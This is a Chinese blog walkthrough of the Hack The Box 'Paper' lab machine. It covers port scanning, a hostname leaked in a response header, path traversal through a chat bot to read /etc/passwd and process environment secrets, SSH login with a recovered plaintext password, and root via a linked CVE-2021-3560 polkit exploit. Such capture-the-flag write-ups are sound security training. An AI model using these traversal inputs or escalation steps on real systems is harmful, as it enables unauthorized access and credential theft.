[Hack The Box] HTB—Paper walkthrough

最新推荐文章于 2023-12-27 21:33:59 发布
最新推荐文章于 2023-12-27 21:33:59 发布
阅读量1.5k 收藏 3
点赞数 3
分类专栏: 渗透 文章标签: linux 渗透 安全 polkit WordPress
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/123094789
版权

[Hack The Box] HTB—Paper walkthrough

HTB—Paper


一、信息搜集

namp

nmap -sV 10.10.11.143

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

具体探测端口

nmap -sC -sV -n -T5 -p 22,80,443 10.10.11.143

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-title: 400 Bad Request
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE

X-Backend-Server

通过响应头找主机名

curl -I http://10.10.11.143

HTTP/1.1 403 Forbidden
Date: Wed, 23 Feb 2022 07:10:06 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

image-20220223151901856

目标网站返回X-Backend-Server包含潜在内部/隐藏 IP 地址或主机名的标头。通过暴露的这些值,攻击者可能会绕过安全代理并直接访问主机。

X-Backend-Server响应标头显示office.paper为主机名。添加到hosts文件中。

10.10.11.143    office.paper

二、网站渗透

访问office.paper

在这里插入图片描述

Wappalyzer 探测出是 WordPress CMS 版本5.2.3

搜到一个未授权漏洞CVE-2019-17671:Wordpress未授权访问漏洞复现

在这里插入图片描述

评论这里也有提示

http://office.paper/?static=1

在这里插入图片描述

hosts里面加上

10.10.11.143    chat.office.paper

http://chat.office.paper/register/8qozr226AhkCHZdyY

image-20220223161110627


bot leads to LFI

注册完后登陆,会弹出一个群聊,里头有个机器人recyclops,可以取文件

3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file sale/secret.xls' or just 'recyclops file test.txt'

image-20220223161556500

私聊他,有LFI漏洞

recyclops file ../../../../../etc/passwd

image-20220223161836483

recyclops file ../../../../../proc/self/environ     //找这个机器人的环境变量

# PWD=/home/dwight/hubot
  ROCKETCHAT_PASSWORD=Queenofblad3s!23
  LOGNAME=dwight

也可以看
recyclops file ../../../../../../../home/dwight/hubot/.env

/proc/self/目录

在进程的pid不清楚的情况下,可以访问**/proc/self/目录,不同的进程访问该目录时获得的信息是不同的,内容等价于/proc/本进程pid/**,进程可以通过访问/proc/self/目录来获取自己的系统信息。

image-20220223162503821

dwight/Queenofblad3s!23

ssh登陆即可

ssh dwight@10.10.11.143

image-20220223163104957

拿到用户flag 09a8dddaa9a016a11a80c433b17eadee


三、提权

linpeas扫描出CVE-2021-3560 Polkit权限提升漏

image-20220223164127219

CVE-2021-3560 是 polkit 上的身份验证绕过,它允许非特权用户使用 DBus 调用特权方法。

Polkit是 Linux 授权系统的一部分,集成了systemd它的操作,并且比传统的sudo系统更具可配置性。它有时被称为sudo of systemd

CVE-2021-3560 poc
https://github.com/Almorabea/Polkit-exploit

上传py脚本并运行

python3 1.py

image-20220223170004243

image-20220223165936213


参考wp:

https://ethicalhacs.com/paper-hackthebox-walkthrough/

shu天
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
废物的靶场日记 hackthebox-Paper
m0_53302733的博客
03-24 1536
废物的靶场日记 hackthebox-Paper 今天做的是easy难度的paper 靶机IP 10.10.11.143 前渗透 信息收集 nmap -sV -A 10.10.11.143 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) 443/tcp open ssl/http Apa
HTB-Paper
TA不懒,但还没有添加简介
09-09 202
HTB-Paper
Hack The Boxlinux练习-- Paper
人间体佐菲的博客
11-29 425
Hack The Boxlinux练习-- Paper
目标攻击漏洞获取目标机器最高权限
jjxsir的博客
12-22 1642
目标攻击漏洞获取目标机器最高权限 目标站点 target: win7x64 192.168.123.1 60[DHCP] attack: kali-linux 192.168.123.136 方法一:通过web站点,使用无文件的方式攻去利用执行 方法二:通过web站点, 上传webshell,返回給msf 方法三:攻击其他端口服务,拿到meterpreterc 信息收集总在前- nmap端口扫描 root@kali:~# nmap -sV -T4 192.168.123.160 Starting Nmap
微服务(六)—— 注册中心模块(backend-server)
CodAlun的博客
07-23 1066
目录一、注册中心二、注册中心配置1.创建SpringBoot项目2. Maven依赖3.配置4. 启动项目5. 注册子系统配置三、配置多注册中心1.配置文件2. 结果 一、注册中心         微服务,用于将大型应用分解成多个独立的组件,其中每个组件都有各自的责任领域。在处理用户请求时,基于微服务的应用可能会调用许多内部微服务来共同生成其响应。         说到
hackthebox:HTB 机器和 InfoSec 社区的笔记
08-04
黑盒子 HTB机注意事项将定期更新,旨在解开所有可能的方式并准备考试还有更多待更新创建和维护: cyberwr3nch内容向无国界医生说不!这个不断地从5月3日更新RD 2020感谢造访菜鸟cyberwr3nch :wrench: TCSC Learn and...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
HTB内容此存储库包含针对HackTheBox挑战,机器和专业实验室的文章。
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
vagrant-htbHackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
HackTheBox:只是我在做HackTheBox时的个人记录
04-03
哈克盒子按HTB难度等级和顺序排序机器简单 :端口445 Netbios Samba用户名映射脚本命令执行:MS08_067 NetAPI远程执行代码漏洞:通过FTP上传的ASPX反向Shell(IIS) :端口443 VTigerCRM(Elastix)本地文件包含LFI...
backend_server:这是一个后端服务器
02-20
backend_server:这是一个后端服务器
vulcand-proxy-backend:Vulcand中间件添加代理标头
05-20
vulcand代理后端服务器 Vulcand的中间件添加X-Backend-Server标头。
服务端编程(四)- 背景知识 - request response 深入介绍
菜鸡的学习之路
02-10 4161
前言 ´・ᴗ・` HTTP request 请求方法 request method 附加信息 addtional info 状态码 GET request结构解析 请求字符串 query string GET response header解析 POST request/response header 总结 ´◡`
[Hack The Box] 靶机1 Meow+Paper
Huamang的博客
03-24 1711
前言 久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干 这次就算是对这个平台的一个熟悉操作吧 Meow 下载到了open文件,kali连接上 然后测试一下可以ping通了 然后就开nmap跑 nmap -sV 10.129.160.90 开启了23端口,telnet服务,直接连接,root账户 直接拿flag 这个算是白给的 Paper 下面就开始打正式的靶机了 一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
HTB靶场系列 linux靶机 Beep靶机
m0_57221101的博客
01-15 1216
这个靶场真的很厉害,学到了非常多的东西 需要学习的技能 nmap扫描具体端口 -sC -sV -p 223 searchspoilt 打开文件 -x sslscan ip 探测目标机器 ssl版本 勘探 首先还是一样用nmap大致扫描,再用nmap对扫出的端口进行细致扫描 nmap nmapshows a bunch of ports open on the box: root@kali# nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10..
HTB Sau Maltraill-v0.53 CVE-2021-3560
最新发布
qq_49288916的博客
12-27 412
编译报错Package ‘dbus-1’, required by ‘virtual:world’, not found使用apt安装libdbus-1-dev解决。sh就提权成功了,为什么会用trail服务因为sudo-l只有这个服务才能不用输入密码。手撮失败,sys返回的值为0.002s,改成0.001和改成0.002都创建不了pwn用户,试了无数次,换个方向。maltrail配置文件在/opt/maltrail/maltrail.conf下发现一串hash。搜索sudo systemctl提权。
Backend(Server)
学习笔记
10-16 435
Server 可以提供两种API: REST API 或 GraphQL API
openssh升级至8.0
yeyiboy的博客
05-11 496
Openssh升级 https://www.cnblogs.com/nmap/p/10779658.html 一、安装依赖 yum update openssh -y yum install -y pam* zlib* yum install -y gcc gcc-c++ glibc make autoconf openssl openssl-devel pcre-devel pam-devel 二、安装openssl-1.0.2r.tar.gz 下载 https...
OpenSSH高危漏洞升级到最新版本openssh-8.0p1
浪学泛微
07-22 3887
CentOS6.x 升级opensshd H17) OpenSSH sshd 权限许可和访问控制漏洞CVE-2015-5600 高 H18) OpenSSH sshd 安全漏洞(CVE-2015-8325) 高 H19) OpenSSH 拒绝服务漏洞(CVE-2016-0778) 高 H20) OpenSSH’ssh/kex.c’拒绝服务漏洞(CVE-2016-8858) 高 H21) OpenS...
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值